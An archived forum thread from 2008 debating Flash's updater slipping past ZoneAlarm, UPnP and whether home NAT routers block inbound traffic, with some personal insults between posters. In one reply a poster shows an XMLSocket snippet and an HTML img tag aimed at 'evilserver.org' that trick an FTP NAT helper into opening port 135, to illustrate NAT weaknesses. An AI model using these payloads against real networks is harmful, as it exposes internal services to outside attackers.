PDA

View Full Version : Adobe Flash Updater accessed internet....but how?



petethebloke@googlemail.com
02-12-08, 03:38 AM
When I booted up this morning (win XP pro) I went to make a cup of tea
and when I got back a program called FlashUtil9D.exe was informing me
that Flash Player had an update as described in APSB07-20. What is
confusing me is how it got access to the internet. I had not started a
browser, there are no Adobe programs in my startup sequence (I use
Start Up Control Panel by Mike Lin) and Zone Alarm is configured to
'ask' for all Adobe applications.

The only thing I can think is that Flash knew about the update last
night and waited till restart to tell me, but this doesn't sound right
because Start Up Monitor normally catches any prog that leaves a
runonce in the registry.

Any ideas? Maybe Adobe has given me a rootkit. I wouldn't be overly
surprised.

Sebastian G.
02-12-08, 08:19 AM
petethebloke@googlemail.com wrote:

> When I booted up this morning (win XP pro) I went to make a cup of tea
> and when I got back a program called FlashUtil9D.exe was informing me
> that Flash Player had an update as described in APSB07-20. What is
> confusing me is how it got access to the internet. I had not started a
> browser, there are no Adobe programs in my startup sequence (I use
> Start Up Control Panel by Mike Lin)


So what? It's loaded as a Browser Helper Object throught the MSHTML engine
in Windows Explorer.

> and Zone Alarm is configured to 'ask' for all Adobe applications.


Why should this matter? Anyway, why have you installed such a nonsense?

> Any ideas? Maybe Adobe has given me a rootkit. I wouldn't be overly
> surprised.


Installing privileged services as documented is no rootkit.

But surely you should expect your system to be compromised and rootkitted,
since you obviously invited malware.

petethebloke@googlemail.com
02-12-08, 08:54 AM
On 12 Feb, 14:19, "Sebastian G." <se...@seppig.de> wrote:
> petethebl...@googlemail.com wrote:
> > When I booted up this morning (win XP pro) I went to make a cup of tea
> > and when I got back a program called FlashUtil9D.exe was informing me
> > that Flash Player had an update as described in APSB07-20. What is
> > confusing me is how it got access to the internet. I had not started a
> > browser, there are no Adobe programs in my startup sequence (I use
> > Start Up Control Panel by Mike Lin)
>
> So what? It's loaded as a Browser Helper Object throught the MSHTML engine
> in Windows Explorer.
>
> > and Zone Alarm is configured to 'ask' for all Adobe applications.
>
> Why should this matter? Anyway, why have you installed such a nonsense?
>
> > Any ideas? Maybe Adobe has given me a rootkit. I wouldn't be overly
> > surprised.
>
> Installing privileged services as documented is no rootkit.
>
> But surely you should expect your system to be compromised and rootkitted,
> since you obviously invited malware.

Hee hee. Thanks Sebastian. Is it the MS WinXP that you consider
malware or the Adobe Flash player? Unfortunately, my line of work
means I have to have Flash player available even though my settings on
the Proxomitron prevent downloads of most of the nice little movies
that people seem to value so highly.

Flash is loaded as a BHO in IE7, you're right there, but I still can't
see how it updates before I start IE7 - which I don't, very often.
From what you're saying, it must be started by Windows and allowed out
through ZoneAlarm as "Generic Host Process win32".

Why does it matter? Because when you think you have your computer
nailed down the way you like it, it's a bit annoying to find that a
sneaky little program that you don't even like using has somehow
bypassed all your day-to-day controls.

Sebastian G.
02-12-08, 09:03 AM
petethebloke@googlemail.com wrote:


> Hee hee. Thanks Sebastian. Is it the MS WinXP that you consider
> malware or the Adobe Flash player?


None. I Just told you that you're obviously inviting malware by having
installed ZoneAlarm.

> Flash is loaded as a BHO in IE7, you're right there, but I still can't
> see how it updates before I start IE7


Because Windows Explorer uses some shell control from IE.

> From what you're saying, it must be started by Windows and allowed out
> through ZoneAlarm as "Generic Host Process win32".


Nonsense. Every service running under LocalSystem account can use Raw
Sockets to bypass NDIS filtering drivers. Which is exactly what the Adobe
License Manager Servie used in some of the expensive Adobe software packages
does (according to documentation and supervision).

> Why does it matter? Because when you think you have your computer
> nailed down the way you like it, it's a bit annoying to find that a
> sneaky little program that you don't even like using has somehow
> bypassed all your day-to-day controls.


Your computer is anything but nailed down. Heck, you have installed ZoneAlarm!

petethebloke@googlemail.com
02-12-08, 09:14 AM
On 12 Feb, 15:03, "Sebastian G." <se...@seppig.de> wrote:
> petethebl...@googlemail.com wrote:
> > Hee hee. Thanks Sebastian. Is it the MS WinXP that you consider
> > malware or the Adobe Flash player?
>
> None. I Just told you that you're obviously inviting malware by having
> installed ZoneAlarm.
>
> > Flash is loaded as a BHO in IE7, you're right there, but I still can't
> > see how it updates before I start IE7
>
> Because Windows Explorer uses some shell control from IE.
>
> > From what you're saying, it must be started by Windows and allowed out
> > through ZoneAlarm as "Generic Host Process win32".
>
> Nonsense. Every service running under LocalSystem account can use Raw
> Sockets to bypass NDIS filtering drivers. Which is exactly what the Adobe
> License Manager Servie used in some of the expensive Adobe software packages
> does (according to documentation and supervision).
>
> > Why does it matter? Because when you think you have your computer
> > nailed down the way you like it, it's a bit annoying to find that a
> > sneaky little program that you don't even like using has somehow
> > bypassed all your day-to-day controls.
>
> Your computer is anything but nailed down. Heck, you have installed ZoneAlarm!

Thanks for the comments. I use Dreamweaver and the FNPLicensing
Service has to be going or DW won't start. That probably explains it
(although Adobe Updater still gets blocked by ZA before I allow it
access to the internet - that must be the less surreptitious version
of Adobe updater).

It's interesting what you say about ZA. I've been using it for several
years and I suppose habit is bad thing. It has become less what I want
it to be in the last year or two, but I complacently figured that it
would give me the protection I need when combined with my network
router. I did get a nasty shock at Christmas though, my son's Xbox 360
was able to reconfigure my router entirely without so much as asking
if I minded. I presume that's uPNP?

Sebastian G.
02-12-08, 11:42 AM
petethebloke@googlemail.com wrote:


> Thanks for the comments. I use Dreamweaver and the FNPLicensing
> Service has to be going or DW won't start. That probably explains it
> (although Adobe Updater still gets blocked by ZA before I allow it
> access to the internet - that must be the less surreptitious version
> of Adobe updater).


According to Adobe's documentation, the License Manager Service's connection
can be used to circumvent obvious misconfigurations (like ZoneAlarm) when
Adobe Updater can't find any connection.


> It's interesting what you say about ZA. I've been using it for several
> years and I suppose habit is bad thing. It has become less what I want
> it to be in the last year or two, but I complacently figured that it
> would give me the protection I need when combined with my network
> router.


I figured that many computer users are unable to recognize the overly
spurious claims of ZoneAlarm as the pure irony it is. I also figured that
these people never bother to verify the functionality, much lesser inform
themselves about known problems and vulnerabilities.

> I did get a nasty shock at Christmas though, my son's Xbox 360
> was able to reconfigure my router entirely without so much as asking
> if I minded. I presume that's uPNP?


Most likely. uPNP, due to being totally unauthenticated, is one of the most
stupid ideas in computer history.

petethebloke@googlemail.com
02-12-08, 12:13 PM
On 12 Feb, 17:42, "Sebastian G." <se...@seppig.de> wrote:
> petethebl...@googlemail.com wrote:
> > Thanks for the comments. I use Dreamweaver and the FNPLicensing
> > Service has to be going or DW won't start. That probably explains it
> > (although Adobe Updater still gets blocked by ZA before I allow it
> > access to the internet - that must be the less surreptitious version
> > of Adobe updater).
>
> According to Adobe's documentation, the License Manager Service's connection
> can be used to circumvent obvious misconfigurations (like ZoneAlarm) when
> Adobe Updater can't find any connection.
>
> > It's interesting what you say about ZA. I've been using it for several
> > years and I suppose habit is bad thing. It has become less what I want
> > it to be in the last year or two, but I complacently figured that it
> > would give me the protection I need when combined with my network
> > router.
>
> I figured that many computer users are unable to recognize the overly
> spurious claims of ZoneAlarm as the pure irony it is. I also figured that
> these people never bother to verify the functionality, much lesser inform
> themselves about known problems and vulnerabilities.
>
> > I did get a nasty shock at Christmas though, my son's Xbox 360
> > was able to reconfigure my router entirely without so much as asking
> > if I minded. I presume that's uPNP?
>
> Most likely. uPNP, due to being totally unauthenticated, is one of the most
> stupid ideas in computer history.

Thanks again Sebastian. You've given me some food for thought. I'll
look at replacing ZA.

Your assumption that "people" never bother to check functionality is
not quite correct in my case - I use GRC's ShieldsUp scan
periodically. I don't expect this to make me totally cracker-proof but
I imagine most script kiddies will move on to easier pickings. You'll
probably poo-poo my naive faith in such amateur methods of defence but
I don't have a lot to hide so I'll probably keep gambling!

But seriously... thanks for your time.

Pete

Sebastian G.
02-12-08, 01:25 PM
petethebloke@googlemail.com wrote:


> Your assumption that "people" never bother to check functionality is
> not quite correct in my case - I use GRC's ShieldsUp scan
> periodically.


Which in turn proves my statement, since this lousy web application of the
well-known charlatan Gibson is about the most wonderful creator of fantasy
reports I've ever seen.

> I don't expect this to make me totally cracker-proof but
> I imagine most script kiddies will move on to easier pickings.


With only two missing points:

- Your system is trivially vulnerable.
- Scripts are not intelligent enough to tell differences. They simply fire
out all exploits and wait for the compromised systems to report back.
- It's not about them choosing your machine, it's about you choosing their
webservers. Just surfing to a website is enough to compromise a system
running ZoneAlarm, and since many legitimate websites including content from
untrusted third partys, it's not like you could avoid this.

petethebloke@googlemail.com
02-12-08, 01:36 PM
On 12 Feb, 19:25, "Sebastian G." <se...@seppig.de> wrote:
> petethebl...@googlemail.com wrote:
> > Your assumption that "people" never bother to check functionality is
> > not quite correct in my case - I use GRC's ShieldsUp scan
> > periodically.
>
> Which in turn proves my statement, since this lousy web application of the
> well-known charlatan Gibson is about the most wonderful creator of fantasy
> reports I've ever seen.
>
> > I don't expect this to make me totally cracker-proof but
> > I imagine most script kiddies will move on to easier pickings.
>
> With only two missing points:
>
> - Your system is trivially vulnerable.
> - Scripts are not intelligent enough to tell differences. They simply fire
> out all exploits and wait for the compromised systems to report back.
> - It's not about them choosing your machine, it's about you choosing their
> webservers. Just surfing to a website is enough to compromise a system
> running ZoneAlarm, and since many legitimate websites including content from
> untrusted third partys, it's not like you could avoid this.

You're a bundle of fun. I must read through your old posts to find out
what you recommend as a solution.

Todd H.
02-12-08, 02:58 PM
"petethebloke@googlemail.com" <petethebloke@googlemail.com> writes:

> You're a bundle of fun. I must read through your old posts to find out
> what you recommend as a solution.

Pete,

Welcome to the group, and sorry I didn't intervene sooner.

You need to know that Sebastian was apparently breastfed by his
father. His mother said she only liked him as a friend. It explains
his winning personality a bit.

Among his more interesting takes, Sebastian recommends using no anti-
virus software at all and using Windows firewall exclusively for
inbound protection. He seems to prefer the latter yet argues oddly
that there isn't any value in home gateway devices that default deny
all unsolicited inbound connections. I intentionally avoid the use of
the word "firewall" here because it's another of Sebastian's ranting
points that such devices aren't "real firewalls."

Sebastian's contributions aren't entirely worthless, but you do have
to apply a liberal filter to his Tech Support Guy bully idiom to glean
those things. We know far more about what Sebastian dislikes than
what we know about what he actually likes. The world has been cruel
to him, perhaps. We may never be sure.

At any rate, I certainly wouldn't take anything he says as the final
word on anything.

Best Regards,
--
Todd H.
http://www.toddh.net/

Sebastian G.
02-12-08, 03:23 PM
Todd H. wrote:

> He seems to prefer the latter yet argues oddly
> that there isn't any value in home gateway devices that default deny
> all unsolicited inbound connections.


Well, because they don't and shouldn't anyway.

> I intentionally avoid the use of
> the word "firewall" here because it's another of Sebastian's ranting
> points that such devices aren't "real firewalls."


A packet filter inside a router can implement a firewall very well. However,
most implementations in SOHO routers are horribly broken and lacking
sufficient configurability.

> At any rate, I certainly wouldn't take anything he says as the final
> word on anything.


You mean that he should wait until someone triggers the unpatched buffer
overflow in ZoneAlarm's HTTP parser?

Todd H.
02-12-08, 04:41 PM
"Sebastian G." <seppi@seppig.de> writes:

> Todd H. wrote:
>
> > He seems to prefer the latter yet argues oddly
> > that there isn't any value in home gateway devices that default deny
> > all unsolicited inbound connections.
>
> Well, because they don't and shouldn't anyway.

I'm open to hearing an example. Say... oh, Broadcom
based box runnin Tomato, openwrt or dd-wrt (by the way you have
anything/everything to do with that project or is your name just
rather similar to Sebastian Gottschall?).

And why shouldnt' they block unsolicited inbound?

> > I intentionally avoid the use of the word "firewall" here because
> > it's another of Sebastian's ranting points that such devices
> > aren't "real firewalls."
>
>
> A packet filter inside a router can implement a firewall very
> well. However, most implementations in SOHO routers are horribly
> broken and lacking sufficient configurability.

Horribly broken how? Name names.


--
Todd H.
http://www.toddh.net/

Gerald Vogt
02-13-08, 12:22 AM
On Feb 13, 5:58 am, comph...@toddh.net (Todd H.) wrote:
> You need to know that Sebastian was apparently breastfed by his
> father. His mother said she only liked him as a friend. It explains
> his winning personality a bit.

Sorry, but this outrageous comment makes you a sick bastard lacking
any kind of decency.

Gerald

Todd H.
02-13-08, 12:49 AM
Gerald Vogt <vogt@spamcop.net> writes:

> On Feb 13, 5:58 am, comph...@toddh.net (Todd H.) wrote:
> > You need to know that Sebastian was apparently breastfed by his
> > father. His mother said she only liked him as a friend. It explains
> > his winning personality a bit.
>
> Sorry, but this outrageous comment makes you a sick bastard lacking
> any kind of decency.

Truth be known, I'm more of a guy who can recall and apply some really
good Rodney Dangerfield lines when the opportunity arises. :-)

Best Regards,
--
Todd H.
http://www.toddh.net/

petethebloke@googlemail.com
02-13-08, 06:02 AM
On 13 Feb, 06:49, comph...@toddh.net (Todd H.) wrote:
> Gerald Vogt <v...@spamcop.net> writes:
> > On Feb 13, 5:58 am, comph...@toddh.net (Todd H.) wrote:
> > > You need to know that Sebastian was apparently breastfed by his
> > > father. His mother said she only liked him as a friend. It explains
> > > his winning personality a bit.
>
> > Sorry, but this outrageous comment makes you a sick bastard lacking
> > any kind of decency.
>
> Truth be known, I'm more of a guy who can recall and apply some really
> good Rodney Dangerfield lines when the opportunity arises. :-)
>
> Best Regards,
> --
> Todd H.http://www.toddh.net/

Thanks Todd, for your intervention. Please don't let yourself be
dragged into a flame war when you were just coming to the aid of this
passing traveller (even if you did kind of start the ball rolling in
the insult department - but Sebastian doesn't come across as the sort
of fellow who needs mollycoddling). I read a few other threads
Sebastian contributed to and he strikes me as a very clever, polyglot,
computer expert who is torn between being generous with his time and
maintaining his contempt for the average joe. He may not have have
oozed the milk of human kindness, but he took the time to reply and to
justify his point of view, even if he didn't suggest or recommend
alternatives. I'm indebted to him - USENET depends on people who give
up a few minutes here and a few minutes there to help strangers and
I'm always astonished by the generosity I find in groups like this.

Pete

Sebastian G.
02-13-08, 07:05 AM
Todd H. wrote:

> "Sebastian G." <seppi@seppig.de> writes:
>
>> Todd H. wrote:
>>
>>> He seems to prefer the latter yet argues oddly
>>> that there isn't any value in home gateway devices that default deny
>>> all unsolicited inbound connections.
>> Well, because they don't and shouldn't anyway.
>
> I'm open to hearing an example. Say... oh, Broadcom
> based box runnin Tomato, openwrt or dd-wrt (by the way you have
> anything/everything to do with that project or is your name just
> rather similar to Sebastian Gottschall?).


Excuse me... I thought you understood the meaning. I should have written
"generally don't". Some implementations, mostly from free volunteers instead
of the vendor, actually are reliable.

> And why shouldnt' they block unsolicited inbound?


Because it's not the purpose of NAT. NAT is supposed to provide
connectivity, and in fact for a 1:1 NAT anything but forwarding all inbound
traffic would be technically wrong.

>>> I intentionally avoid the use of the word "firewall" here because
>>> it's another of Sebastian's ranting points that such devices
>>> aren't "real firewalls."
>>
>> A packet filter inside a router can implement a firewall very
>> well. However, most implementations in SOHO routers are horribly
>> broken and lacking sufficient configurability.
>
> Horribly broken how?


application layer NAT helpers, heuristics, bad IP fragment reassembly...

Ansgar -59cobalt- Wiechers
02-13-08, 08:17 AM
Todd H. <comphelp@toddh.net> wrote:
> You need to know that Sebastian was apparently breastfed by his
> father. His mother said she only liked him as a friend. It explains
> his winning personality a bit.

*plonk*

cu
59cobalt
--
"If a software developer ever believes a rootkit is a necessary part of
their architecture they should go back and re-architect their solution."
--Mark Russinovich

Todd H.
02-13-08, 08:39 AM
"Sebastian G." <seppi@seppig.de> writes:

> Todd H. wrote:
>
> > "Sebastian G." <seppi@seppig.de> writes:
> >
> >> Todd H. wrote:
> >>
> >>> He seems to prefer the latter yet argues oddly
> >>> that there isn't any value in home gateway devices that default deny
> >>> all unsolicited inbound connections.
> >> Well, because they don't and shouldn't anyway.
> > I'm open to hearing an example. Say... oh, Broadcom
> > based box runnin Tomato, openwrt or dd-wrt (by the way you have
> > anything/everything to do with that project or is your name just
> > rather similar to Sebastian Gottschall?).
>
>
> Excuse me... I thought you understood the meaning. I should have
> written "generally don't". Some implementations, mostly from free
> volunteers instead of the vendor, actually are reliable.

Fair nuff. Your saying "they don't [provide any value]" did paint
with an awfully broad brush.

So I guess then Buffalo branded devices will soon have your stamp of
approval and soften you from the "home nat routers are worthless"
stance?

> > And why shouldnt' they block unsolicited inbound?
>
> Because it's not the purpose of NAT. NAT is supposed to provide
> connectivity, and in fact for a 1:1 NAT anything but forwarding all
> inbound traffic would be technically wrong.

That's like saying "real muscle cars didn't have seatbelts and modern
ones shouldn't either," then calling a modern car "unsafe and
shouldn't be." That's kinda bizarre to me.

I think that criticism is poorly placed. These boxes are not sold as
"pristine brilliant pure NAT devices" nor should they be. They're
sold in no small part to protect home networks from the constant
barrage of network based scans. No one cares about the purity of the
NAT definition - so long as unsolicited inbound network traffic is
reliably blocked, what does it matter?

> >>> I intentionally avoid the use of the word "firewall" here because
> >>> it's another of Sebastian's ranting points that such devices
> >>> aren't "real firewalls."
> >>
> >> A packet filter inside a router can implement a firewall very
> >> well. However, most implementations in SOHO routers are horribly
> >> broken and lacking sufficient configurability.
> > Horribly broken how?
>
> application layer NAT helpers, heuristics, bad IP fragment
> reassembly...

This also paints with a pretty broad brush. Has nyone published
anything on say, the oft-recommended Linksys WRT54G about such issues?

Best Regards,
--
Todd H.
http://www.toddh.net/

Todd H.
02-13-08, 08:48 AM
"petethebloke@googlemail.com" <petethebloke@googlemail.com> writes:

> On 13 Feb, 06:49, comph...@toddh.net (Todd H.) wrote:
> > Gerald Vogt <v...@spamcop.net> writes:
> > > On Feb 13, 5:58 am, comph...@toddh.net (Todd H.) wrote:
> > > > You need to know that Sebastian was apparently breastfed by his
> > > > father. His mother said she only liked him as a friend. It explains
> > > > his winning personality a bit.
> >
> > > Sorry, but this outrageous comment makes you a sick bastard lacking
> > > any kind of decency.
> >
> > Truth be known, I'm more of a guy who can recall and apply some really
> > good Rodney Dangerfield lines when the opportunity arises. :-)
> >
> > Best Regards,
> > --
> > Todd H.http://www.toddh.net/
>
> Thanks Todd, for your intervention. Please don't let yourself be
> dragged into a flame war when you were just coming to the aid of this
> passing traveller (even if you did kind of start the ball rolling in
> the insult department - but Sebastian doesn't come across as the sort
> of fellow who needs mollycoddling). I read a few other threads
> Sebastian contributed to and he strikes me as a very clever, polyglot,
> computer expert who is torn between being generous with his time and
> maintaining his contempt for the average joe. He may not have have
> oozed the milk of human kindness, but he took the time to reply and to
> justify his point of view, even if he didn't suggest or recommend
> alternatives. I'm indebted to him - USENET depends on people who give
> up a few minutes here and a few minutes there to help strangers and
> I'm always astonished by the generosity I find in groups like this.
>
> Pete

You make a good point. As I hinted earlier, for all of the faults of
the ever acerbic Sebastian, when pressed on technical points, he will
give up information if asked, which is why this forum is certainly
better off with him than without. However it's the default "bash,
trash, but not compellingly explain" modus operandi that leaves me
scratching my head many times. It's a strange thing to be on one hand
generous with your time, yet be contemptuous toward those to whom
you're giving it. Depends on one's
altruism-to-makin-myself-feel-smart motivation ratio for participating
in usenet, I suppose.

Best Regards,
--
Todd H.
http://www.toddh.net/

Sebastian G.
02-13-08, 09:52 AM
Todd H. wrote:


> So I guess then Buffalo branded devices will soon have your stamp of
> approval and soften you from the "home nat routers are worthless"
> stance?


No. The problem with NAT is that there're multiple ways to influence client
applications to trigger forwarding rules. Just take a look at Flash and
Java, not mentioning VoIP applications...

> No one cares about the purity of the
> NAT definition - so long as unsolicited inbound network traffic is
> reliably blocked, what does it matter?


Because it creates connectivity problems?
Because your proclaimed reliable doesn't exist, by design?
Because such a blockade is pretty superfluos?

> This also paints with a pretty broad brush. Has nyone published
> anything on say, the oft-recommended Linksys WRT54G about such issues?

Yes, see <http://bedatec.dyndns.org/ftpnat/routers_en.html>. Please denote
that this is not a problem of the implementation, but the configuration: If
the interface would allow proper low-level access to netfilter/iptables
instead of the limited front-end, one could properly take the FTP NAT helper
into account (or even deactivate it).

Todd H.
02-13-08, 11:02 AM
"Sebastian G." <seppi@seppig.de> writes:

> Todd H. wrote:
>
>
> > So I guess then Buffalo branded devices will soon have your stamp of
> > approval and soften you from the "home nat routers are worthless"
> > stance?
>
>
> No. The problem with NAT is that there're multiple ways to influence
> client applications to trigger forwarding rules. Just take a look at
> Flash and Java, not mentioning VoIP applications...

Patch (authentication bypass holes that have befallen Linksys in the
past) and disable the inanity of uPNP and we're done with that
though.

Or do you have something else in mind?

> > No one cares about the purity of the NAT definition - so long as
> > unsolicited inbound network traffic is reliably blocked, what does
> > it matter?
>
> Because it creates connectivity problems?
> Because your proclaimed reliable doesn't exist, by design?
> Because such a blockade is pretty superfluos?

Like hundreds of thousands of people, I use one of these classes of
boxes. What connectivity problems?

How do you posit that inbound blocking on a nat router is any more
superfluous than the Windows Firewall software that you do seem to
like?

> > This also paints with a pretty broad brush. Has nyone published
> > anything on say, the oft-recommended Linksys WRT54G about such issues?
>
> Yes, see <http://bedatec.dyndns.org/ftpnat/routers_en.html>. Please
> denote that this is not a problem of the implementation, but the
> configuration: If the interface would allow proper low-level access to
> netfilter/iptables instead of the limited front-end, one could
> properly take the FTP NAT helper into account (or even deactivate it).

Interesting. Wish the test description weren't in German though.
Is there a BID on this vuln? Or basically, I'm now curious what this
test was.

Best Regards,
--
Todd H.
http://www.toddh.net/

Sebastian G.
02-13-08, 11:39 AM
Todd H. wrote:

> "Sebastian G." <seppi@seppig.de> writes:
>
>> Todd H. wrote:
>>
>>
>>> So I guess then Buffalo branded devices will soon have your stamp of
>>> approval and soften you from the "home nat routers are worthless"
>>> stance?
>>
>> No. The problem with NAT is that there're multiple ways to influence
>> client applications to trigger forwarding rules. Just take a look at
>> Flash and Java, not mentioning VoIP applications...
>
> Patch (authentication bypass holes that have befallen Linksys in the
> past) and disable the inanity of uPNP and we're done with that
> though.
>
> Or do you have something else in mind?


XMLSocket foo = new XMLSocket("evilserver.org",31337);
foo.setLocalPort(135);
XMLRequest bar = new XMlRequest("whatever");
foo.sendrequest(bar);

There's nothing exploited, it's just the way NAT works.

Or, even simpler:

<img src="ftp://evilserver.org/%10%13SET%20%PORT%20135,0,1,0,168,192%10%13">

Nothing exploited, that's just how FTP NAT helpers work.

> Like hundreds of thousands of people, I use one of these classes of
> boxes. What connectivity problems?


Aside from even the simplest load balancing breaking? Just take any
sufficiently complex protocol, f.e. various P2P protocols, various computer
games, VoIP applications...

> How do you posit that inbound blocking on a nat router is any more
> superfluous than the Windows Firewall software that you do seem to
> like?


I don't have too, since this is solely your claim so far.

> Interesting. Wish the test description weren't in German though.
> Is there a BID on this vuln? Or basically, I'm now curious what this
> test was.


It's basically a Java or Flash applet acting as a FTP client, using the PORT
command, the FTP NAT helper parsing the command and adding an appropriate
NAT table entry. There's nothing wrong with this, it justs void some false
security assumptions about NAT.

BrainSlayer
07-04-08, 08:11 AM
just as information. Sebastian G. here is not Sebastian Gottschall
(BrainSlayer), even if he seems to live in the same town or area.
but i found out that 2 persons with the same name are living here, if i
look at the student list here at the university

thx,
Sebastian Gottschall


--
BrainSlayer
------------------------------------------------------------------------
BrainSlayer's Profile: http://forums.techarena.in/member.php?u=52513
View this thread: http://forums.techarena.in/showthread.php?t=913471

http://forums.techarena.in